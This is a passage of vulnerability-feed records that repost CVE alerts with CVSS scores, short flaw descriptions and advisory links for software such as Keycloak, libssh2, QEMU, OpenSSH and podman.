Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-8883\n\ud83d\udd25 CVSS Score: 6.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)\n\ud83d\udd39 Description: A misconfiguration flaw was found in Keycloak. This issue can allow an attacker to redirect users to an arbitrary URL if a 'Valid Redirect URI' is set to http://localhost or http://127.0.0.1, enabling sensitive information such as authorization codes to be exposed to the attacker, potentially leading to session hijacking.\n\ud83d\udccf Published: 2024-09-19T15:48:28.468Z\n\ud83d\udccf Modified: 2025-05-02T17:07:25.650Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10385\n2. https://access.redhat.com/errata/RHSA-2024:10386\n3. https://access.redhat.com/errata/RHSA-2024:6878\n4. https://access.redhat.com/errata/RHSA-2024:6879\n5. https://access.redhat.com/errata/RHSA-2024:6880\n6. https://access.redhat.com/errata/RHSA-2024:6882\n7. https://access.redhat.com/errata/RHSA-2024:6886\n8. https://access.redhat.com/errata/RHSA-2024:6887\n9. https://access.redhat.com/errata/RHSA-2024:6888\n10. https://access.redhat.com/errata/RHSA-2024:6889\n11. https://access.redhat.com/errata/RHSA-2024:6890\n12. https://access.redhat.com/errata/RHSA-2024:8823\n13. https://access.redhat.com/errata/RHSA-2024:8824\n14. https://access.redhat.com/errata/RHSA-2024:8826\n15. https://access.redhat.com/security/cve/CVE-2024-8883\n16. https://bugzilla.redhat.com/show_bug.cgi?id=2312511\n17. https://github.com/keycloak/keycloak/blob/main/services/src/main/java/org/keycloak/protocol/oidc/utils/RedirectUtils.java", "creation_timestamp": "2025-05-02T17:16:23.000000Z"}, {"uuid": "4f1f3d6e-62f3-4050-991a-c4022d4ce987", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:2399", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/13137", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2019-3856\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_0, Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: An integer overflow flaw, which could lead to an out of bounds write, was discovered in libssh2 before 1.8.1 in the way keyboard prompt requests are parsed. A remote attacker who compromises a SSH server may be able to execute code on the client system when a user connects to the server.\n\ud83d\udccf Published: 2019-03-25T18:31:03.000Z\n\ud83d\udccf Modified: 2025-04-23T19:48:00.365Z\n\ud83d\udd17 References:\n1. https://www.libssh2.org/CVE-2019-3856.html\n2. https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3856\n3. https://lists.debian.org/debian-lts-announce/2019/03/msg00032.html\n4. https://security.netapp.com/advisory/ntap-20190327-0005/\n5. https://access.redhat.com/errata/RHSA-2019:0679\n6. http://lists.opensuse.org/opensuse-security-announce/2019-03/msg00040.html\n7. http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00003.html\n8. https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5DK6VO2CEUTAJFYIKWNZKEKYMYR3NO2O/\n9. https://www.debian.org/security/2019/dsa-4431\n10. https://seclists.org/bugtraq/2019/Apr/25\n11. https://access.redhat.com/errata/RHSA-2019:1175\n12. https://access.redhat.com/errata/RHSA-2019:1652\n13. https://access.redhat.com/errata/RHSA-2019:1791\n14. https://access.redhat.com/errata/RHSA-2019:1943\n15. https://access.redhat.com/errata/RHSA-2019:2399\n16. https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", "creation_timestamp": "2025-04-23T20:04:49.000000Z"}, {"uuid": "89b2b70a-9c40-4463-88e0-3f89be6ec575", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WPC6-J37R-JCX7", "type": "published-proof-of-concept", "source": "Telegram/d-ziUJquW87C-wxQ1bihwuEueQX9ENOtUxcvU39erDutk3U", "content": "", "creation_timestamp": "2026-01-02T21:54:27.000000Z"}, {"uuid": "086714d2-e856-4d8b-b0a1-8703746cb4e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W3X5-7C4C-66P9", "type": "published-proof-of-concept", "source": "Telegram/d-ziUJquW87C-wxQ1bihwuEueQX9ENOtUxcvU39erDutk3U", "content": "", "creation_timestamp": "2026-01-02T21:54:27.000000Z"}, {"uuid": "6c674f79-3feb-44e9-a15f-266a04efffaf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:6811", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/14625", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-7409\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_0, Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in the QEMU NBD Server. This vulnerability allows a denial of service (DoS) attack via improper synchronization during socket closure when a client keeps a socket open as the server is taken offline.\n\ud83d\udccf Published: 2024-08-05T13:19:27.498Z\n\ud83d\udccf Modified: 2025-05-02T23:03:01.411Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10518\n2. https://access.redhat.com/errata/RHSA-2024:10528\n3. https://access.redhat.com/errata/RHSA-2024:10813\n4. https://access.redhat.com/errata/RHSA-2024:6811\n5. https://access.redhat.com/errata/RHSA-2024:6818\n6. https://access.redhat.com/errata/RHSA-2024:6964\n7. https://access.redhat.com/errata/RHSA-2024:7408\n8. https://access.redhat.com/errata/RHSA-2024:8991\n9. https://access.redhat.com/errata/RHSA-2024:9136\n10. https://access.redhat.com/errata/RHSA-2024:9620\n11. https://access.redhat.com/errata/RHSA-2024:9912\n12. https://access.redhat.com/security/cve/CVE-2024-7409\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2302487", "creation_timestamp": "2025-05-02T23:17:20.000000Z"}, {"uuid": "e66d85d6-9735-41da-a73a-b4932353bd62", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:7408", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/14625", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-7409\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_0, Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in the QEMU NBD Server. This vulnerability allows a denial of service (DoS) attack via improper synchronization during socket closure when a client keeps a socket open as the server is taken offline.\n\ud83d\udccf Published: 2024-08-05T13:19:27.498Z\n\ud83d\udccf Modified: 2025-05-02T23:03:01.411Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10518\n2. https://access.redhat.com/errata/RHSA-2024:10528\n3. https://access.redhat.com/errata/RHSA-2024:10813\n4. https://access.redhat.com/errata/RHSA-2024:6811\n5. https://access.redhat.com/errata/RHSA-2024:6818\n6. https://access.redhat.com/errata/RHSA-2024:6964\n7. https://access.redhat.com/errata/RHSA-2024:7408\n8. https://access.redhat.com/errata/RHSA-2024:8991\n9. https://access.redhat.com/errata/RHSA-2024:9136\n10. https://access.redhat.com/errata/RHSA-2024:9620\n11. https://access.redhat.com/errata/RHSA-2024:9912\n12. https://access.redhat.com/security/cve/CVE-2024-7409\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2302487", "creation_timestamp": "2025-05-02T23:17:20.000000Z"}, {"uuid": "ce82f86f-3003-42f8-9ecc-333d574297de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:6818", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/14625", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-7409\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_0, Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in the QEMU NBD Server. This vulnerability allows a denial of service (DoS) attack via improper synchronization during socket closure when a client keeps a socket open as the server is taken offline.\n\ud83d\udccf Published: 2024-08-05T13:19:27.498Z\n\ud83d\udccf Modified: 2025-05-02T23:03:01.411Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10518\n2. https://access.redhat.com/errata/RHSA-2024:10528\n3. https://access.redhat.com/errata/RHSA-2024:10813\n4. https://access.redhat.com/errata/RHSA-2024:6811\n5. https://access.redhat.com/errata/RHSA-2024:6818\n6. https://access.redhat.com/errata/RHSA-2024:6964\n7. https://access.redhat.com/errata/RHSA-2024:7408\n8. https://access.redhat.com/errata/RHSA-2024:8991\n9. https://access.redhat.com/errata/RHSA-2024:9136\n10. https://access.redhat.com/errata/RHSA-2024:9620\n11. https://access.redhat.com/errata/RHSA-2024:9912\n12. https://access.redhat.com/security/cve/CVE-2024-7409\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2302487", "creation_timestamp": "2025-05-02T23:17:20.000000Z"}, {"uuid": "a8e0f132-21dc-43c8-8806-fcd01204dd3d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:9620", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/14625", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-7409\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_0, Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in the QEMU NBD Server. This vulnerability allows a denial of service (DoS) attack via improper synchronization during socket closure when a client keeps a socket open as the server is taken offline.\n\ud83d\udccf Published: 2024-08-05T13:19:27.498Z\n\ud83d\udccf Modified: 2025-05-02T23:03:01.411Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10518\n2. https://access.redhat.com/errata/RHSA-2024:10528\n3. https://access.redhat.com/errata/RHSA-2024:10813\n4. https://access.redhat.com/errata/RHSA-2024:6811\n5. https://access.redhat.com/errata/RHSA-2024:6818\n6. https://access.redhat.com/errata/RHSA-2024:6964\n7. https://access.redhat.com/errata/RHSA-2024:7408\n8. https://access.redhat.com/errata/RHSA-2024:8991\n9. https://access.redhat.com/errata/RHSA-2024:9136\n10. https://access.redhat.com/errata/RHSA-2024:9620\n11. https://access.redhat.com/errata/RHSA-2024:9912\n12. https://access.redhat.com/security/cve/CVE-2024-7409\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2302487", "creation_timestamp": "2025-05-02T23:17:20.000000Z"}, {"uuid": "a507dd05-d3eb-4d58-8770-93d42050cd7f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JF2R-X3J4-23M7", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/14630", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-46723\n\ud83d\udd25 CVSS Score: 7.8 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:P)\n\ud83d\udd39 Description: OpenVM is a performant and modular zkVM framework built for customization and extensibility. In version 1.0.0, OpenVM is vulnerable to overflow through byte decomposition of pc in AUIPC chip. A typo results in the highest limb of pc being range checked to 8-bits instead of 6-bits. This results in the if statement never being triggered because the enumeration gives i=0,1,2, when instead the enumeration should give i=1,2,3, leaving pc_limbs[3] range checked to 8-bits instead of 6-bits. This leads to a vulnerability where the pc_limbs decomposition differs from the true pc, which means a malicious prover can make the destination register take a different value than the AUIPC instruction dictates, by making the decomposition overflow the BabyBear field. This issue has been patched in version 1.1.0.\n\ud83d\udccf Published: 2025-05-02T22:18:55.696Z\n\ud83d\udccf Modified: 2025-05-02T22:18:55.696Z\n\ud83d\udd17 References:\n1. https://github.com/openvm-org/openvm/security/advisories/GHSA-jf2r-x3j4-23m7\n2. https://github.com/openvm-org/openvm/commit/68da4b50c033da5603517064aa0a08e1bbf70a01\n3. https://cantina.xyz/code/c486d600-bed0-4fc6-aed1-de759fd29fa2/findings/21\n4. https://github.com/openvm-org/openvm/blob/0f94c8a3dfa7536c1231465d1bdee5fc607a5993/extensions/rv32im/circuit/src/auipc/core.rs#L135\n5. https://github.com/openvm-org/openvm/releases/tag/v1.1.0", "creation_timestamp": "2025-05-02T23:17:25.000000Z"}, {"uuid": "6f184edd-e310-47c2-8fe1-6d0198ac16f0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4G8V-VG43-WPGF", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/14629", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-28362\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: The redirect_to method in Rails allows provided values to contain characters which are not legal in an HTTP header value. This results in the potential for downstream services which enforce RFC compliance on HTTP response headers to remove the assigned Location header.\n\ud83d\udccf Published: 2025-01-09T00:33:47.730Z\n\ud83d\udccf Modified: 2025-05-02T23:02:56.188Z\n\ud83d\udd17 References:\n1. https://discuss.rubyonrails.org/t/cve-2023-28362-possible-xss-via-user-supplied-values-to-redirect-to/83132\n2. https://github.com/advisories/GHSA-4g8v-vg43-wpgf\n3. https://github.com/rails/rails/commit/1c3f93d1e90a3475f9ae2377ead25ccf11f71441\n4. https://github.com/rails/rails/commit/69e37c84e3f77d75566424c7d0015172d6a6fac5", "creation_timestamp": "2025-05-02T23:17:24.000000Z"}, {"uuid": "56638fe1-ff99-4b03-b1fd-4c7cc1299d48", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MF88-G2WQ-P7QM", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/14937", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-24977\n\ud83d\udd25 CVSS Score: 9.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: OpenCTI is an open cyber threat intelligence (CTI) platform. Prior to version 6.4.11 any user with the capability `manage customizations` can execute commands on the underlying infrastructure where OpenCTI is hosted and can access internal server side secrets by misusing the web-hooks. Since the malicious user gets a root shell inside a container this opens up the the infrastructure environment for further attacks and exposures. Version 6.4.11 fixes the issue.\n\ud83d\udccf Published: 2025-05-05T17:07:35.812Z\n\ud83d\udccf Modified: 2025-05-05T17:07:35.812Z\n\ud83d\udd17 References:\n1. https://github.com/OpenCTI-Platform/opencti/security/advisories/GHSA-mf88-g2wq-p7qm", "creation_timestamp": "2025-05-05T17:20:26.000000Z"}, {"uuid": "fb1f36ea-c82e-41a9-8e6d-9b482de1c3ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1501", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16071", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-05-12T23:02:02.486Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-05-12T23:29:31.000000Z"}, {"uuid": "8013ea3c-93db-40d4-a878-37e27d29b370", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X39X-9QW5-GHRF", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/14707", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-47241\n\ud83d\udd25 CVSS Score: 4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:L/A:N)\n\ud83d\udd39 Description: In browser-use (aka Browser Use) before 0.1.45, URL parsing of allowed_domains is mishandled because userinfo can be placed in the authority component.\n\ud83d\udccf Published: 2025-05-03T00:00:00.000Z\n\ud83d\udccf Modified: 2025-05-03T20:42:50.524Z\n\ud83d\udd17 References:\n1. https://github.com/browser-use/browser-use/security/advisories/GHSA-x39x-9qw5-ghrf\n2. https://github.com/browser-use/browser-use/releases/tag/0.1.45\n3. https://github.com/browser-use/browser-use/pull/1561", "creation_timestamp": "2025-05-03T21:19:13.000000Z"}, {"uuid": "ff68e0ec-cd1d-4505-bf15-7f4ce569294b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MFG2-QR5C-99PP", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/19979", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-53004\n\ud83d\udd25 CVSS Score: 7.8 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:P)\n\ud83d\udd39 Description: DataEase is an open source business intelligence and data visualization tool. Prior to version 2.10.11, the sslfactory and sslfactoryarg parameters could trigger a bypass vulnerability. This issue has been patched in version 2.10.11.\n\ud83d\udccf Published: 2025-06-30T20:18:49.563Z\n\ud83d\udccf Modified: 2025-06-30T20:38:24.609Z\n\ud83d\udd17 References:\n1. https://github.com/dataease/dataease/security/advisories/GHSA-mfg2-qr5c-99pp\n2. https://github.com/dataease/dataease/commit/dd35752f298b1a4079d9993b622220d321b0c8a6", "creation_timestamp": "2025-06-30T21:09:27.000000Z"}, {"uuid": "4cc650c9-01af-4f8c-b6ec-ba7bdc9ab540", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PVQV-8R3R-47M9", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/20085", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27153\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N)\n\ud83d\udd39 Description: Escalade GLPI plugin is a ticket escalation process helper for GLPI. Prior to version 2.9.11, there is an improper access control vulnerability. This can lead to data exposure and workflow disruptions. This issue has been patched in version 2.9.11.\n\ud83d\udccf Published: 2025-07-01T18:27:50.677Z\n\ud83d\udccf Modified: 2025-07-01T19:35:43.790Z\n\ud83d\udd17 References:\n1. https://github.com/pluginsGLPI/escalade/security/advisories/GHSA-pvqv-8r3r-47m9\n2. https://github.com/pluginsGLPI/escalade/releases/tag/2.9.11", "creation_timestamp": "2025-07-01T20:09:46.000000Z"}, {"uuid": "93a6b759-55fa-474d-957c-a145ffd403e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W7QC-6GRJ-W7R8", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19969", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-52995\n\ud83d\udd25 CVSS Score: 8.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: File Browser provides a file managing interface within a specified directory and it can be used to upload, delete, preview, rename and edit files. Prior to version 2.33.10, the implementation of the allowlist is erroneous, allowing a user to execute more shell commands than they are authorized for. The concrete impact of this vulnerability depends on the commands configured, and the binaries installed on the server or in the container image. Due to the missing separation of scopes on the OS-level, this could give an attacker access to all files managed the application, including the File Browser database. This issue has been patched in version 2.33.10.\n\ud83d\udccf Published: 2025-06-30T19:57:52.307Z\n\ud83d\udccf Modified: 2025-06-30T19:57:52.307Z\n\ud83d\udd17 References:\n1. https://github.com/filebrowser/filebrowser/security/advisories/GHSA-w7qc-6grj-w7r8\n2. https://github.com/filebrowser/filebrowser/commit/4d830f707fc4314741fd431e70c2ce50cd5a3108\n3. https://github.com/filebrowser/filebrowser/releases/tag/v2.33.10", "creation_timestamp": "2025-06-30T20:08:47.000000Z"}, {"uuid": "326f5f4f-a640-46f3-9b54-7450a7f06d18", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:1189", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/12130", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11218\n\ud83d\udd25 CVSS Score: 8.6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in `podman build` and `buildah.` This issue occurs in a container breakout by using --jobs=2 and a race condition when building a malicious Containerfile. SELinux might mitigate it, but even with SELinux on, it still allows the enumeration of files and directories on the host.\n\ud83d\udccf Published: 2025-01-22T04:55:30.649Z\n\ud83d\udccf Modified: 2025-04-16T18:43:10.993Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0830\n2. https://access.redhat.com/errata/RHSA-2025:0878\n3. https://access.redhat.com/errata/RHSA-2025:0922\n4. https://access.redhat.com/errata/RHSA-2025:0923\n5. https://access.redhat.com/errata/RHSA-2025:1186\n6. https://access.redhat.com/errata/RHSA-2025:1187\n7. https://access.redhat.com/errata/RHSA-2025:1188\n8. https://access.redhat.com/errata/RHSA-2025:1189\n9. https://access.redhat.com/errata/RHSA-2025:1207\n10. https://access.redhat.com/errata/RHSA-2025:1275\n11. https://access.redhat.com/errata/RHSA-2025:1295\n12. https://access.redhat.com/errata/RHSA-2025:1296\n13. https://access.redhat.com/errata/RHSA-2025:1372\n14. https://access.redhat.com/errata/RHSA-2025:1453\n15. https://access.redhat.com/errata/RHSA-2025:1707\n16. https://access.redhat.com/errata/RHSA-2025:1713\n17. https://access.redhat.com/errata/RHSA-2025:1908\n18. https://access.redhat.com/errata/RHSA-2025:1910\n19. https://access.redhat.com/errata/RHSA-2025:1914\n20. https://access.redhat.com/errata/RHSA-2025:2441\n21. https://access.redhat.com/errata/RHSA-2025:2443\n22. https://access.redhat.com/errata/RHSA-2025:2454\n23. https://access.redhat.com/errata/RHSA-2025:2456\n24. https://access.redhat.com/errata/RHSA-2025:2701\n25. https://access.redhat.com/errata/RHSA-2025:2703\n26. https://access.redhat.com/errata/RHSA-2025:2710\n27. https://access.redhat.com/errata/RHSA-2025:2712\n28. https://access.redhat.com/errata/RHSA-2025:3577\n29. https://access.redhat.com/errata/RHSA-2025:3798\n30. https://access.redhat.com/security/cve/CVE-2024-11218\n31. https://bugzilla.redhat.com/show_bug.cgi?id=2326231", "creation_timestamp": "2025-04-16T18:56:07.000000Z"}, {"uuid": "f6a4b329-b8aa-46ca-a270-e5253cab4aaa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CPWW-GWGC-P72R", "type": "published-proof-of-concept", "source": "Telegram/i8bForBP1dZBDut81Rl3-X-SxUGQomBUf7AnX6qGlfBFF0o", "content": "", "creation_timestamp": "2026-01-07T21:06:23.000000Z"}, {"uuid": "91bbd7af-1f82-493f-89c8-21c10718ec89", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4340", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/13317", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-6387\n\ud83d\udd25 CVSS Score: 8.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A security regression (CVE-2006-5051) was discovered in OpenSSH's server (sshd). There is a race condition which can lead sshd to handle some signals in an unsafe manner. An unauthenticated, remote attacker may be able to trigger it by failing to authenticate within a set time period.\n\ud83d\udccf Published: 2024-07-01T12:37:25.431Z\n\ud83d\udccf Modified: 2025-04-24T18:35:27.934Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:4312\n2. https://access.redhat.com/errata/RHSA-2024:4340\n3. https://access.redhat.com/errata/RHSA-2024:4389\n4. https://access.redhat.com/errata/RHSA-2024:4469\n5. https://access.redhat.com/errata/RHSA-2024:4474\n6. https://access.redhat.com/errata/RHSA-2024:4479\n7. https://access.redhat.com/errata/RHSA-2024:4484\n8. https://access.redhat.com/security/cve/CVE-2024-6387\n9. https://bugzilla.redhat.com/show_bug.cgi?id=2294604\n10. https://santandersecurityresearch.github.io/blog/sshing_the_masses.html\n11. 